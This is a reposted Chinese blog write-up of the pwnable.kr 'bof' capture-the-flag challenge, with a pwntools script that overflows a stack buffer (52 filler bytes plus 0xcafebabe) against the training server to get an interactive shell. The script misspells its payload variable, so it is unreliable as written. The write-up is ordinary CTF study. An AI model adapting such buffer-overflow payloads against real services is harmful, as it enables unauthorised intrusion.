欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

18.9.17 pwnable.kr----bof - 5 pt

程序员文章站 2022-05-15 15:56:08
...

18.9.17 pwnable.kr----bof - 5 pt

直接调整ebp,修改renturnaddress,覆盖到key的地址后赋值0xcafebabe就可以了

ebp地址偏移量可一直接在IDA里面看见哟

上脚本

#coding=utf-8
from pwn import *
conn=remote("pwnable.kr",9000)
payload='a'*52+p32(0xcafebabe)
conn.recvuntil('overflow me : ')
conn.sendline(paylaod)
conn.interactive()

#daddy, I just pwned a buFFer :)

 

相关标签: pwnable.kr bof